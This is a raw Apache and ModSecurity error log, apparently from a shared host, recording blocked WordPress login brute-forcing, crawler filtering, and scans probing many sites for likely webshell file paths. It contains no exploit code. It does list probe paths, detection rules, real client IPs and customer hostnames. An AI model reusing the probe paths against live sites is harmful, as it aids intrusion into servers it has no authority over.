[Tue May 26 17:33:35.541906 2026] [security2:error] [pid 894579:tid 894585] [remote 178.104.90.233:52080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWMFwEtZWuWWBGzl__ZigABEwU"]
[Tue May 26 17:33:36.069091 2026] [security2:error] [pid 891273:tid 891460] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMF8DEzZ8z3jtDm82sYgAAADk"]
[Tue May 26 17:33:36.785479 2026] [security2:error] [pid 891273:tid 891479] [client 195.178.110.48:51178] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "shreyasonline.com.md-74.webhostbox.net"] [uri "/"] [unique_id "ahWMGMDEzZ8z3jtDm82sgQAAAEw"]
[Tue May 26 17:33:37.950318 2026] [security2:error] [pid 894579:tid 894760] [client 223.235.98.214:8448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMGQEtZWuWWBGzl__Z7QAAATw"]
[Tue May 26 17:33:37.950461 2026] [security2:error] [pid 894579:tid 894760] [client 223.235.98.214:8448] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMGQEtZWuWWBGzl__Z7QAAATw"]
[Tue May 26 17:33:38.441900 2026] [security2:error] [pid 894579:tid 894795] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMGgEtZWuWWBGzl__Z9wAAAV4"]
[Tue May 26 17:33:39.186183 2026] [security2:error] [pid 891273:tid 891319] [remote 84.247.181.196:32940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWMG8DEzZ8z3jtDm82sngAADi0"]
[Tue May 26 17:33:39.479611 2026] [fcgid:warn] [pid 894579:tid 894716] (70014)End of file found: [client 66.132.195.49:13174] mod_fcgid: can't get data from http client
[Tue May 26 17:33:39.901737 2026] [security2:error] [pid 891273:tid 891519] [client 168.119.96.239:35886] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWMG8DEzZ8z3jtDm82srAAAAHQ"], referer: https://thegoodsporting.com
[Tue May 26 17:33:41.172434 2026] [security2:error] [pid 891273:tid 891427] [client 45.154.98.76:57209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWMHcDEzZ8z3jtDm82s2gAAABg"], referer: www.google.com
[Tue May 26 17:33:41.173399 2026] [security2:error] [pid 891273:tid 891523] [client 45.154.98.76:57136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-plain.php"] [unique_id "ahWMHcDEzZ8z3jtDm82s2wAAAHg"], referer: www.google.com
[Tue May 26 17:33:41.283278 2026] [security2:error] [pid 891273:tid 891444] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMHMDEzZ8z3jtDm82szwAAACk"]
[Tue May 26 17:33:41.327599 2026] [security2:error] [pid 891273:tid 891452] [client 45.154.98.76:57538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWMHcDEzZ8z3jtDm82s4QAAADE"]
[Tue May 26 17:33:41.338436 2026] [core:error] [pid 891273:tid 891426] (104)Connection reset by peer: [client 45.154.98.76:57090] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 17:33:41.476960 2026] [security2:error] [pid 894579:tid 894781] [client 45.154.98.76:58870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/eauxqilh.php"] [unique_id "ahWMHQEtZWuWWBGzl__adwAAAVA"], referer: www.google.com
[Tue May 26 17:33:41.613690 2026] [security2:error] [pid 894579:tid 894769] [client 45.154.98.76:54714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWMHQEtZWuWWBGzl__afQAAAUQ"], referer: www.google.com
[Tue May 26 17:33:41.925072 2026] [security2:error] [pid 891273:tid 891439] [client 45.154.98.76:61830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-plain.php"] [unique_id "ahWMHcDEzZ8z3jtDm82s7wAAACQ"], referer: www.google.com
[Tue May 26 17:33:42.069485 2026] [security2:error] [pid 894579:tid 894804] [client 45.154.98.76:57308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/etpokxky.php"] [unique_id "ahWMHgEtZWuWWBGzl__akQAAAWc"], referer: www.google.com
[Tue May 26 17:33:43.081696 2026] [security2:error] [pid 894579:tid 894831] [client 66.132.195.49:13196] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "deeigo.com"] [uri "/public/index.php"] [unique_id "ahWMHwEtZWuWWBGzl__aqgAAAYI"]
[Tue May 26 17:33:45.044574 2026] [security2:error] [pid 891273:tid 891502] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMIMDEzZ8z3jtDm82tEgAAAGM"]
[Tue May 26 17:33:46.001491 2026] [security2:error] [pid 891273:tid 891436] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMIcDEzZ8z3jtDm82tHgAAACE"]
[Tue May 26 17:33:46.661189 2026] [security2:error] [pid 894579:tid 894814] [client 103.168.190.98:50293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.190.168.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "plenitudotonal.com"] [uri "/xmlrpc.php"] [unique_id "ahWMIgEtZWuWWBGzl__bSgAAAXE"]
[Tue May 26 17:33:46.661332 2026] [security2:error] [pid 894579:tid 894814] [client 103.168.190.98:50293] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "plenitudotonal.com"] [uri "/xmlrpc.php"] [unique_id "ahWMIgEtZWuWWBGzl__bSgAAAXE"]
[Tue May 26 17:33:46.683466 2026] [core:error] [pid 891273:tid 891519] (104)Connection reset by peer: [client 45.154.98.76:55625] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 17:33:47.320407 2026] [security2:error] [pid 894579:tid 894715] [client 181.10.145.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMIgEtZWuWWBGzl__bXwAAAQ8"]
[Tue May 26 17:33:47.873439 2026] [security2:error] [pid 891273:tid 891526] [client 114.119.139.251:48591] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWMI8DEzZ8z3jtDm82tPAAAAHs"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2023-11-13
[Tue May 26 17:33:48.160131 2026] [security2:error] [pid 891273:tid 891425] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMI8DEzZ8z3jtDm82tOQAAABY"]
[Tue May 26 17:33:48.488978 2026] [security2:error] [pid 891273:tid 891506] [client 223.235.98.214:8206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMJMDEzZ8z3jtDm82tRQAAAGc"]
[Tue May 26 17:33:48.489080 2026] [security2:error] [pid 891273:tid 891506] [client 223.235.98.214:8206] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMJMDEzZ8z3jtDm82tRQAAAGc"]
[Tue May 26 17:33:49.982015 2026] [security2:error] [pid 891273:tid 891328] [remote 51.75.236.138:60976] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "traderscafe.in"] [uri "/robots.txt"] [unique_id "ahWMJcDEzZ8z3jtDm82tbgAASTY"]
[Tue May 26 17:33:49.982396 2026] [security2:error] [pid 891273:tid 891476] [client 51.75.236.138:60976] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "traderscafe.in"] [uri "/robots.txt"] [unique_id "ahWMJcDEzZ8z3jtDm82tbgAASTY"]
[Tue May 26 17:33:51.170518 2026] [security2:error] [pid 894579:tid 894751] [client 114.119.156.99:40185] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "crusties.agsnails.com"] [uri "/robots.txt"] [unique_id "ahWMJwEtZWuWWBGzl__cCQAAATM"]
[Tue May 26 17:33:51.231013 2026] [security2:error] [pid 894579:tid 894724] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMJgEtZWuWWBGzl__b_QAAARg"]
[Tue May 26 17:33:51.464095 2026] [security2:error] [pid 894579:tid 894702] [remote 54.39.89.189:18522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "traderscafe.in"] [uri "/"] [unique_id "ahWMJwEtZWuWWBGzl__cFAABVHo"]
[Tue May 26 17:33:51.464281 2026] [security2:error] [pid 894579:tid 894785] [client 54.39.89.189:18522] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "traderscafe.in"] [uri "/"] [unique_id "ahWMJwEtZWuWWBGzl__cFAABVHo"]
[Tue May 26 17:33:52.001534 2026] [core:error] [pid 891273:tid 891416] (104)Connection reset by peer: [client 45.154.98.76:51623] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 17:33:52.352877 2026] [security2:error] [pid 891273:tid 891509] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMJ8DEzZ8z3jtDm82tjgAAAGo"]
[Tue May 26 17:33:52.701837 2026] [autoindex:error] [pid 894579:tid 894736] [client 49.234.192.248:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.glorodbalsa.com
[Tue May 26 17:33:54.111149 2026] [security2:error] [pid 891273:tid 891525] [client 104.194.132.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWMKsDEzZ8z3jtDm82twwAAAHo"], referer: https://www.anujtradingco.com/
[Tue May 26 17:33:54.934420 2026] [security2:error] [pid 894579:tid 894757] [client 104.194.132.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWMKgEtZWuWWBGzl__cjwAAATk"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1430893&moderation-hash=336e5499fbddf823815df3a0e5a22c7e
[Tue May 26 17:33:55.218695 2026] [security2:error] [pid 894579:tid 894775] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMKgEtZWuWWBGzl__ciwAAAUo"]
[Tue May 26 17:33:57.021979 2026] [security2:error] [pid 894579:tid 894795] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMLAEtZWuWWBGzl__ctwAAAV4"]
[Tue May 26 17:33:57.295318 2026] [security2:error] [pid 894579:tid 894822] [client 114.119.129.25:25091] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "amdsi.org.in"] [uri "/images/Jewel_StLawerenceTheMartyr.jpg"] [unique_id "ahWMLQEtZWuWWBGzl__c1QAAAXk"], referer: http://amdsi.org.in/images/Jewel_StLawerenceTheMartyr.jpg
[Tue May 26 17:33:57.317307 2026] [core:error] [pid 894579:tid 894743] (104)Connection reset by peer: [client 45.154.98.76:62381] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 17:33:59.597338 2026] [security2:error] [pid 894579:tid 894789] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMLwEtZWuWWBGzl__dFgAAAVg"]
[Tue May 26 17:33:59.719682 2026] [security2:error] [pid 891273:tid 891423] [client 223.235.98.214:28765] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWML8DEzZ8z3jtDm82uKwAAABQ"]
[Tue May 26 17:33:59.719806 2026] [security2:error] [pid 891273:tid 891423] [client 223.235.98.214:28765] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWML8DEzZ8z3jtDm82uKwAAABQ"]
[Tue May 26 17:34:02.375877 2026] [security2:error] [pid 891273:tid 891471] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMMcDEzZ8z3jtDm82uTQAAAEQ"]
[Tue May 26 17:34:02.629154 2026] [core:error] [pid 894579:tid 894718] (104)Connection reset by peer: [client 45.154.98.76:63421] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 17:34:03.850327 2026] [security2:error] [pid 894579:tid 894723] [client 114.119.147.248:29793] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahWMMwEtZWuWWBGzl__d1QAAARc"]
[Tue May 26 17:34:04.456014 2026] [security2:error] [pid 894579:tid 894692] [remote 74.7.241.58:44774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWMNAEtZWuWWBGzl__d8AABI3A"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/woocommerce/templates/emails
[Tue May 26 17:34:04.538442 2026] [security2:error] [pid 894579:tid 894740] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMNAEtZWuWWBGzl__d4QAAASg"]
[Tue May 26 17:34:06.148282 2026] [security2:error] [pid 894579:tid 894600] [remote 163.223.13.54:36756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWMNQEtZWuWWBGzl__eMQABFRQ"]
[Tue May 26 17:34:06.697610 2026] [security2:error] [pid 894579:tid 894729] [client 20.196.127.68:3674] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "kardashevtechnologies.com"] [uri "/1.php"] [unique_id "ahWMNgEtZWuWWBGzl__eWgAAAR0"]
[Tue May 26 17:34:06.768465 2026] [security2:error] [pid 894579:tid 894729] [client 20.196.127.68:3674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/1.php"] [unique_id "ahWMNgEtZWuWWBGzl__eWgAAAR0"]
[Tue May 26 17:34:07.029210 2026] [security2:error] [pid 894579:tid 894790] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMNgEtZWuWWBGzl__eVQAAAVk"]
[Tue May 26 17:34:07.439177 2026] [security2:error] [pid 891273:tid 891517] [client 20.196.127.68:9240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/2.php"] [unique_id "ahWMN8DEzZ8z3jtDm82ungAAAHI"]
[Tue May 26 17:34:08.086131 2026] [security2:error] [pid 891273:tid 891426] [client 20.196.127.68:2121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/7.php"] [unique_id "ahWMOMDEzZ8z3jtDm82uqAAAABc"]
[Tue May 26 17:34:08.241694 2026] [core:error] [pid 891273:tid 891472] (104)Connection reset by peer: [client 45.154.98.76:51776] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 17:34:08.711424 2026] [core:error] [pid 894579:tid 894784] (104)Connection reset by peer: [client 45.154.98.76:63741] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 17:34:08.770833 2026] [security2:error] [pid 894579:tid 894713] [client 20.196.127.68:1209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/10.php"] [unique_id "ahWMOAEtZWuWWBGzl__eiAAAAQ0"]
[Tue May 26 17:34:09.166749 2026] [security2:error] [pid 891273:tid 891373] [remote 65.2.90.30:46056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWMOMDEzZ8z3jtDm82usgAAAWM"]
[Tue May 26 17:34:09.353994 2026] [security2:error] [pid 891273:tid 891443] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMOMDEzZ8z3jtDm82usQAAACg"]
[Tue May 26 17:34:09.374565 2026] [security2:error] [pid 891273:tid 891418] [client 20.196.127.68:3290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/13.php"] [unique_id "ahWMOcDEzZ8z3jtDm82uuAAAAA8"]
[Tue May 26 17:34:10.042079 2026] [security2:error] [pid 894579:tid 894776] [client 20.196.127.68:9238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/100.php"] [unique_id "ahWMOgEtZWuWWBGzl__enAAAAUs"]
